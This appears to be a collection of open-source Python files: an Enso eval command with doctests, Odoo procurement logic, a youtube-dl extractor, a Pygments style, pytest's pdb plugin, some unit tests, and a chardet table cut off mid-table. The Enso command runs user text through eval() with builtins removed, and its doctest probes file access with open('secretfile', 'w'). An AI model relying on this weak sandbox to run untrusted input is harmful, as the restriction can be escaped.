displayMessage = messages.displayMessage
if selection is None:
import enso.selection
selection = enso.selection
self._selection = selection
self._displayMessage = displayMessage
def run( self, seldict=None ):
if seldict is None:
seldict = self._selection.get()
text = seldict.get( "text", u"" ).strip()
evalSuccessful = False
append = False
if text.endswith( "=" ):
text = text[:-1].strip()
append = True
if not text:
self._displayMessage( "<p>No code to evaluate!</p>" )
else:
try:
code = compile( text, "<selected text>", "eval" )
result = eval( code, {"__builtins__":None}, {} )
evalSuccessful = True
except Exception, e:
self._displayMessage(
"<p>Error: %s</p>" % xml_tools.escape_xml(str(e))
)
if evalSuccessful:
resulttext = unicode( repr(result) )
if append:
newtext = "%s = %s" % (text, resulttext)
else:
newtext = resulttext
self._selection.set( {"text" : newtext} )
# ----------------------------------------------------------------------------
# Plugin initialization
# ---------------------------------------------------------------------------
def load():
CommandManager.get().registerCommand(
EvalCommand.NAME,
EvalCommand()
)
# ----------------------------------------------------------------------------
# Doctests
# ---------------------------------------------------------------------------
def test_evaluate():
"""
Set up mock objects:
>>> def mockDisplayMessage( text ):
... print "message: %s" % text
>>> class MockSelection( object ):
... def set( self, seldict ):
... print "set selection: %s" % seldict
Initialize our command with the mock objects:
>>> ec = EvalCommand( mockDisplayMessage, MockSelection() )
Ensure that the command works if nothing is selected:
>>> ec.run( {} )
message: <p>No code to evaluate!</p>
Ensure that the command works in the general case:
>>> ec.run( {'text' : u'5+3'} )
set selection: {'text': u'8'}
Ensure that the command works with syntax errors:
>>> ec.run( {'text' : u'5+'} )
message: <p>Error: unexpected EOF while parsing (<selected text>, line 1)</p>
Ensure that the command doesn't allow standard Python builtins to be used:
>>> ec.run( {'text' : u'open("secretfile", "w")'} )
message: <p>Error: name 'open' is not defined</p>
"""
pass
if __name__ == "__main__":
import doctest
doctest.testmod()
|
bsd-3-clause
|
CopeX/odoo
|
addons/procurement/procurement.py
|
151
|
15839
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from psycopg2 import OperationalError
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import openerp
PROCUREMENT_PRIORITIES = [('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')]
class procurement_group(osv.osv):
'''
The procurement group class is used to group products together
when computing procurements. (tasks, physical products, ...)
The goal is that when you have one sale order of several products
and the products are pulled from the same or several location(s), to keep
having the moves grouped into pickings that represent the sale order.
Used in: sales order (to group delivery order lines like the so), pull/push
rules (to pack like the delivery order), on orderpoints (e.g. for wave picking
all the similar products together).
Grouping is made only if the source and the destination is the same.
Suppose you have 4 lines on a picking from Output where 2 lines will need
to come from Input (crossdock) and 2 lines coming from Stock -> Output As
the four procurement orders will have the same group ids from the SO, the
move from input will have a stock.picking with 2 grouped lines and the move
from stock will have 2 grouped lines also.
The name is usually the name of the original document (sale order) or a
sequence computed if created manually.
'''
_name = 'procurement.group'
_description = 'Procurement Requisition'
_order = "id desc"
_columns = {
'name': fields.char('Reference', required=True),
'move_type': fields.selection([
('direct', 'Partial'), ('one', 'All at once')],
'Delivery Method', required=True),
'procurement_ids': fields.one2many('procurement.order', 'group_id', 'Procurements'),
}
_defaults = {
'name': lambda self, cr, uid, c: self.pool.get('ir.sequence').get(cr, uid, 'procurement.group') or '',
'move_type': lambda self, cr, uid, c: 'direct'
}
class procurement_rule(osv.osv):
'''
A rule describe what a procurement should do; produce, buy, move, ...
'''
_name = 'procurement.rule'
_description = "Procurement Rule"
_order = "name"
def _get_action(self, cr, uid, context=None):
return []
_columns = {
'name': fields.char('Name', required=True, translate=True,
help="This field will fill the packing origin and the name of its moves"),
'active': fields.boolean('Active', help="If unchecked, it will allow you to hide the rule without removing it."),
'group_propagation_option': fields.selection([('none', 'Leave Empty'), ('propagate', 'Propagate'), ('fixed', 'Fixed')], string="Propagation of Procurement Group"),
'group_id': fields.many2one('procurement.group', 'Fixed Procurement Group'),
'action': fields.selection(selection=lambda s, cr, uid, context=None: s._get_action(cr, uid, context=context),
string='Action', required=True),
'sequence': fields.integer('Sequence'),
'company_id': fields.many2one('res.company', 'Company'),
}
_defaults = {
'group_propagation_option': 'propagate',
'sequence': 20,
'active': True,
}
class procurement_order(osv.osv):
"""
Procurement Orders
"""
_name = "procurement.order"
_description = "Procurement"
_order = 'priority desc, date_planned, id asc'
_inherit = ['mail.thread']
_log_create = False
_columns = {
'name': fields.text('Description', required=True),
'origin': fields.char('Source Document',
help="Reference of the document that created this Procurement.\n"
"This is automatically completed by Odoo."),
'company_id': fields.many2one('res.company', 'Company', required=True),
# These two fields are used for shceduling
'priority': fields.selection(PROCUREMENT_PRIORITIES, 'Priority', required=True, select=True, track_visibility='onchange'),
'date_planned': fields.datetime('Scheduled Date', required=True, select=True, track_visibility='onchange'),
'group_id': fields.many2one('procurement.group', 'Procurement Group'),
'rule_id': fields.many2one('procurement.rule', 'Rule', track_visibility='onchange', help="Chosen rule for the procurement resolution. Usually chosen by the system but can be manually set by the procurement manager to force an unusual behavior."),
'product_id': fields.many2one('product.product', 'Product', required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_qty': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uom': fields.many2one('product.uom', 'Product Unit of Measure', required=True, states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uos_qty': fields.float('UoS Quantity', states={'confirmed': [('readonly', False)]}, readonly=True),
'product_uos': fields.many2one('product.uom', 'Product UoS', states={'confirmed': [('readonly', False)]}, readonly=True),
'state': fields.selection([
('cancel', 'Cancelled'),
('confirmed', 'Confirmed'),
('exception', 'Exception'),
('running', 'Running'),
('done', 'Done')
], 'Status', required=True, track_visibility='onchange', copy=False),
}
_defaults = {
'state': 'confirmed',
'priority': '1',
'date_planned': lambda *a: time.strftime('%Y-%m-%d %H:%M:%S'),
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'procurement.order', context=c)
}
def unlink(self, cr, uid, ids, context=None):
procurements = self.read(cr, uid, ids, ['state'], context=context)
unlink_ids = []
for s in procurements:
if s['state'] == 'cancel':
unlink_ids.append(s['id'])
else:
raise osv.except_osv(_('Invalid Action!'),
_('Cannot delete Procurement Order(s) which are in %s state.') % s['state'])
return osv.osv.unlink(self, cr, uid, unlink_ids, context=context)
def do_view_procurements(self, cr, uid, ids, context=None):
'''
This function returns an action that display existing procurement orders
of same procurement group of given ids.
'''
act_obj = self.pool.get('ir.actions.act_window')
action_id = self.pool.get('ir.model.data').xmlid_to_res_id(cr, uid, 'procurement.do_view_procurements', raise_if_not_found=True)
result = act_obj.read(cr, uid, [action_id], context=context)[0]
group_ids = set([proc.group_id.id for proc in self.browse(cr, uid, ids, context=context) if proc.group_id])
result['domain'] = "[('group_id','in',[" + ','.join(map(str, list(group_ids))) + "])]"
return result
def onchange_product_id(self, cr, uid, ids, product_id, context=None):
""" Finds UoM and UoS of changed product.
@param product_id: Changed id of product.
@return: Dictionary of values.
"""
if product_id:
w = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
v = {
'product_uom': w.uom_id.id,
'product_uos': w.uos_id and w.uos_id.id or w.uom_id.id
}
return {'value': v}
return {}
def get_cancel_ids(self, cr, uid, ids, context=None):
return [proc.id for proc in self.browse(cr, uid, ids, context=context) if proc.state != 'done']
def cancel(self, cr, uid, ids, context=None):
#cancel only the procurements that aren't done already
to_cancel_ids = self.get_cancel_ids(cr, uid, ids, context=context)
if to_cancel_ids:
return self.write(cr, uid, to_cancel_ids, {'state': 'cancel'}, context=context)
def reset_to_confirmed(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'confirmed'}, context=context)
def run(self, cr, uid, ids, autocommit=False, context=None):
for procurement_id in ids:
#we intentionnaly do the browse under the for loop to avoid caching all ids which would be resource greedy
#and useless as we'll make a refresh later that will invalidate all the cache (and thus the next iteration
#will fetch all the ids again)
procurement = self.browse(cr, uid, procurement_id, context=context)
if procurement.state not in ("running", "done"):
try:
if self._assign(cr, uid, procurement, context=context):
res = self._run(cr, uid, procurement, context=context or {})
if res:
self.write(cr, uid, [procurement.id], {'state': 'running'}, context=context)
else:
self.write(cr, uid, [procurement.id], {'state': 'exception'}, context=context)
else:
self.message_post(cr, uid, [procurement.id], body=_('No rule matching this procurement'), context=context)
self.write(cr, uid, [procurement.id], {'state': 'exception'}, context=context)
if autocommit:
cr.commit()
except OperationalError:
if autocommit:
cr.rollback()
continue
else:
raise
return True
def check(self, cr, uid, ids, autocommit=False, context=None):
done_ids = []
for procurement in self.browse(cr, uid, ids, context=context):
try:
result = self._check(cr, uid, procurement, context=context)
if result:
done_ids.append(procurement.id)
if autocommit:
cr.commit()
except OperationalError:
if autocommit:
cr.rollback()
continue
else:
raise
if done_ids:
self.write(cr, uid, done_ids, {'state': 'done'}, context=context)
return done_ids
#
# Method to overwrite in different procurement modules
#
def _find_suitable_rule(self, cr, uid, procurement, context=None):
'''This method returns a procurement.rule that depicts what to do with the given procurement
in order to complete its needs. It returns False if no suiting rule is found.
:param procurement: browse record
:rtype: int or False
'''
return False
def _assign(self, cr, uid, procurement, context=None):
'''This method check what to do with the given procurement in order to complete its needs.
It returns False if no solution is found, otherwise it stores the matching rule (if any) and
returns True.
:param procurement: browse record
:rtype: boolean
'''
#if the procurement already has a rule assigned, we keep it (it has a higher priority as it may have been chosen manually)
if procurement.rule_id:
return True
elif procurement.product_id.type != 'service':
rule_id = self._find_suitable_rule(cr, uid, procurement, context=context)
if rule_id:
self.write(cr, uid, [procurement.id], {'rule_id': rule_id}, context=context)
return True
return False
def _run(self, cr, uid, procurement, context=None):
'''This method implements the resolution of the given procurement
:param procurement: browse record
:returns: True if the resolution of the procurement was a success, False otherwise to set it in exception
'''
return True
def _check(self, cr, uid, procurement, context=None):
'''Returns True if the given procurement is fulfilled, False otherwise
:param procurement: browse record
:rtype: boolean
'''
return False
#
# Scheduler
#
def run_scheduler(self, cr, uid, use_new_cursor=False, company_id = False, context=None):
'''
Call the scheduler to check the procurement order. This is intented to be done for all existing companies at
the same time, so we're running all the methods as SUPERUSER to avoid intercompany and access rights issues.
@param self: The object pointer
@param cr: The current row, from the database cursor,
@param uid: The current user ID for security checks
@param ids: List of selected IDs
@param use_new_cursor: if set, use a dedicated cursor and auto-commit after processing each procurement.
This is appropriate for batch jobs only.
@param context: A standard dictionary for contextual values
@return: Dictionary of values
'''
if context is None:
context = {}
try:
if use_new_cursor:
cr = openerp.registry(cr.dbname).cursor()
# Run confirmed procurements
dom = [('state', '=', 'confirmed')]
if company_id:
dom += [('company_id', '=', company_id)]
prev_ids = []
while True:
ids = self.search(cr, SUPERUSER_ID, dom, context=context)
if not ids or prev_ids == ids:
break
else:
prev_ids = ids
self.run(cr, SUPERUSER_ID, ids, autocommit=use_new_cursor, context=context)
if use_new_cursor:
cr.commit()
# Check if running procurements are done
offset = 0
dom = [('state', '=', 'running')]
if company_id:
dom += [('company_id', '=', company_id)]
prev_ids = []
while True:
ids = self.search(cr, SUPERUSER_ID, dom, offset=offset, context=context)
if not ids or prev_ids == ids:
break
else:
prev_ids = ids
self.check(cr, SUPERUSER_ID, ids, autocommit=use_new_cursor, context=context)
if use_new_cursor:
cr.commit()
finally:
if use_new_cursor:
try:
cr.close()
except Exception:
pass
return {}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
noba3/KoTos
|
addons/script.module.youtube.dl/lib/youtube_dl/extractor/sunporno.py
|
127
|
2384
|
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
parse_duration,
int_or_none,
qualities,
determine_ext,
)
class SunPornoIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?sunporno\.com/videos/(?P<id>\d+)'
_TEST = {
'url': 'http://www.sunporno.com/videos/807778/',
'md5': '6457d3c165fd6de062b99ef6c2ff4c86',
'info_dict': {
'id': '807778',
'ext': 'flv',
'title': 'md5:0a400058e8105d39e35c35e7c5184164',
'description': 'md5:a31241990e1bd3a64e72ae99afb325fb',
'thumbnail': 're:^https?://.*\.jpg$',
'duration': 302,
'age_limit': 18,
}
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
title = self._html_search_regex(
r'<title>([^<]+)</title>', webpage, 'title')
description = self._html_search_meta(
'description', webpage, 'description')
thumbnail = self._html_search_regex(
r'poster="([^"]+)"', webpage, 'thumbnail', fatal=False)
duration = parse_duration(self._search_regex(
r'itemprop="duration">\s*(\d+:\d+)\s*<',
webpage, 'duration', fatal=False))
view_count = int_or_none(self._html_search_regex(
r'class="views">(?:<noscript>)?\s*(\d+)\s*<',
webpage, 'view count', fatal=False))
comment_count = int_or_none(self._html_search_regex(
r'(\d+)</b> Comments?',
webpage, 'comment count', fatal=False))
formats = []
quality = qualities(['mp4', 'flv'])
for video_url in re.findall(r'<(?:source|video) src="([^"]+)"', webpage):
video_ext = determine_ext(video_url)
formats.append({
'url': video_url,
'format_id': video_ext,
'quality': quality(video_ext),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'age_limit': 18,
}
|
gpl-2.0
|
adrian-zumbler/IdealNews
|
node_modules/grunt-docker/node_modules/docker/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/styles/colorful.py
|
364
|
2778
|
# -*- coding: utf-8 -*-
"""
pygments.styles.colorful
~~~~~~~~~~~~~~~~~~~~~~~~
A colorful style, inspired by CodeRay.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, \
Number, Operator, Generic, Whitespace
class ColorfulStyle(Style):
"""
A colorful style, inspired by CodeRay.
"""
default_style = ""
styles = {
Whitespace: "#bbbbbb",
Comment: "#888",
Comment.Preproc: "#579",
Comment.Special: "bold #cc0000",
Keyword: "bold #080",
Keyword.Pseudo: "#038",
Keyword.Type: "#339",
Operator: "#333",
Operator.Word: "bold #000",
Name.Builtin: "#007020",
Name.Function: "bold #06B",
Name.Class: "bold #B06",
Name.Namespace: "bold #0e84b5",
Name.Exception: "bold #F00",
Name.Variable: "#963",
Name.Variable.Instance: "#33B",
Name.Variable.Class: "#369",
Name.Variable.Global: "bold #d70",
Name.Constant: "bold #036",
Name.Label: "bold #970",
Name.Entity: "bold #800",
Name.Attribute: "#00C",
Name.Tag: "#070",
Name.Decorator: "bold #555",
String: "bg:#fff0f0",
String.Char: "#04D bg:",
String.Doc: "#D42 bg:",
String.Interpol: "bg:#eee",
String.Escape: "bold #666",
String.Regex: "bg:#fff0ff #000",
String.Symbol: "#A60 bg:",
String.Other: "#D20",
Number: "bold #60E",
Number.Integer: "bold #00D",
Number.Float: "bold #60E",
Number.Hex: "bold #058",
Number.Oct: "bold #40E",
Generic.Heading: "bold #000080",
Generic.Subheading: "bold #800080",
Generic.Deleted: "#A00000",
Generic.Inserted: "#00A000",
Generic.Error: "#FF0000",
Generic.Emph: "italic",
Generic.Strong: "bold",
Generic.Prompt: "bold #c65d09",
Generic.Output: "#888",
Generic.Traceback: "#04D",
Error: "#F00 bg:#FAA"
}
|
mit
|
Haibo-Wang-ORG/pytest
|
_pytest/pdb.py
|
27
|
3415
|
""" interactive debugging with PDB, the Python Debugger. """
from __future__ import absolute_import
import pdb
import sys
import pytest
def pytest_addoption(parser):
group = parser.getgroup("general")
group._addoption('--pdb',
action="store_true", dest="usepdb", default=False,
help="start the interactive Python debugger on errors.")
def pytest_namespace():
return {'set_trace': pytestPDB().set_trace}
def pytest_configure(config):
if config.getvalue("usepdb"):
config.pluginmanager.register(PdbInvoke(), 'pdbinvoke')
old = (pdb.set_trace, pytestPDB._pluginmanager)
def fin():
pdb.set_trace, pytestPDB._pluginmanager = old
pytestPDB._config = None
pdb.set_trace = pytest.set_trace
pytestPDB._pluginmanager = config.pluginmanager
pytestPDB._config = config
config._cleanup.append(fin)
class pytestPDB:
""" Pseudo PDB that defers to the real pdb. """
_pluginmanager = None
_config = None
def set_trace(self):
""" invoke PDB set_trace debugging, dropping any IO capturing. """
import _pytest.config
frame = sys._getframe().f_back
capman = None
if self._pluginmanager is not None:
capman = self._pluginmanager.getplugin("capturemanager")
if capman:
capman.suspendcapture(in_=True)
tw = _pytest.config.create_terminal_writer(self._config)
tw.line()
tw.sep(">", "PDB set_trace (IO-capturing turned off)")
self._pluginmanager.hook.pytest_enter_pdb()
pdb.Pdb().set_trace(frame)
class PdbInvoke:
def pytest_exception_interact(self, node, call, report):
capman = node.config.pluginmanager.getplugin("capturemanager")
if capman:
capman.suspendcapture(in_=True)
_enter_pdb(node, call.excinfo, report)
def pytest_internalerror(self, excrepr, excinfo):
for line in str(excrepr).split("\n"):
sys.stderr.write("INTERNALERROR> %s\n" %line)
sys.stderr.flush()
tb = _postmortem_traceback(excinfo)
post_mortem(tb)
def _enter_pdb(node, excinfo, rep):
# XXX we re-use the TerminalReporter's terminalwriter
# because this seems to avoid some encoding related troubles
# for not completely clear reasons.
tw = node.config.pluginmanager.getplugin("terminalreporter")._tw
tw.line()
tw.sep(">", "traceback")
rep.toterminal(tw)
tw.sep(">", "entering PDB")
tb = _postmortem_traceback(excinfo)
post_mortem(tb)
rep._pdbshown = True
return rep
def _postmortem_traceback(excinfo):
# A doctest.UnexpectedException is not useful for post_mortem.
# Use the underlying exception instead:
from doctest import UnexpectedException
if isinstance(excinfo.value, UnexpectedException):
return excinfo.value.exc_info[2]
else:
return excinfo._excinfo[2]
def _find_last_non_hidden_frame(stack):
i = max(0, len(stack) - 1)
while i and stack[i][0].f_locals.get("__tracebackhide__", False):
i -= 1
return i
def post_mortem(t):
class Pdb(pdb.Pdb):
def get_stack(self, f, t):
stack, i = pdb.Pdb.get_stack(self, f, t)
if f is None:
i = _find_last_non_hidden_frame(stack)
return stack, i
p = Pdb()
p.reset()
p.interaction(None, t)
|
mit
|
Atlas-Sailed-Co/oppia
|
core/domain/gadget_registry_test.py
|
24
|
1686
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for methods in gadget registry."""
__author__ = 'Michael Anuzis'
import os
from core.domain import gadget_registry
from core.tests import test_utils
from extensions.gadgets import base
import feconf
class GadgetRegistryUnitTests(test_utils.GenericTestBase):
"""Test for the gadget registry."""
def test_allowed_gadgets_and_counts(self):
"""Do sanity checks on the ALLOWED_GADGETS dict in feconf.py."""
self.assertEqual(
len(gadget_registry.Registry.get_all_gadgets()),
len(feconf.ALLOWED_GADGETS))
for (gadget_name, gadget_definition) in (
feconf.ALLOWED_GADGETS.iteritems()):
contents = os.listdir(
os.path.join(os.getcwd(), gadget_definition['dir']))
self.assertIn('%s.py' % gadget_name, contents)
def test_get_all_specs(self):
"""Test the get_all_specs() method."""
specs_dict = gadget_registry.Registry.get_all_specs()
self.assertEqual(
len(specs_dict.keys()), len(feconf.ALLOWED_GADGETS))
|
apache-2.0
|
Ghalko/osf.io
|
tests/test_permissions.py
|
58
|
1302
|
# -*- coding: utf-8 -*-
"""Tests for the permissions module."""
import unittest
from nose.tools import * # PEP8 asserts
from website.util import permissions
def test_expand_permissions():
result = permissions.expand_permissions('admin')
assert_equal(result, ['read', 'write', 'admin'])
result2 = permissions.expand_permissions('write')
assert_equal(result2, ['read', 'write'])
result3 = permissions.expand_permissions(None)
assert_equal(result3, [])
def test_reduce_permissions():
result = permissions.reduce_permissions(['read', 'write', 'admin'])
assert_equal(result, 'admin')
result2 = permissions.reduce_permissions(['read', 'write'])
assert_equal(result2, 'write')
result3 = permissions.reduce_permissions(['read'])
assert_equal(result3, 'read')
def test_reduce_permissions_with_empty_list_raises_error():
with assert_raises(ValueError):
permissions.reduce_permissions([])
def test_reduce_permissions_with_unknown_permission_raises_error():
with assert_raises(ValueError):
permissions.reduce_permissions(['unknownpermission'])
def test_default_contributor_permissions():
assert_equal(permissions.DEFAULT_CONTRIBUTOR_PERMISSIONS,
['read', 'write'])
if __name__ == '__main__':
unittest.main()
|
apache-2.0
|
julien78910/CouchPotatoServer
|
libs/chardet/langcyrillicmodel.py
|
2762
|
17725
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# KOI8-R language model
# Character Mapping Table:
KOI8R_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90
223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0
238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0
27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0
15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0
59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0
35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0
)
win1251_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
)
latin5_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
macCyrillic_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255,
)
IBM855_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205,
206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70,
3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219,
220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229,
230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243,
8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248,
43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249,
250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255,
)
IBM866_CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40
155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50
253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60
67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70
37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35,
45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43,
3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15,
191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,
207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,
223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,
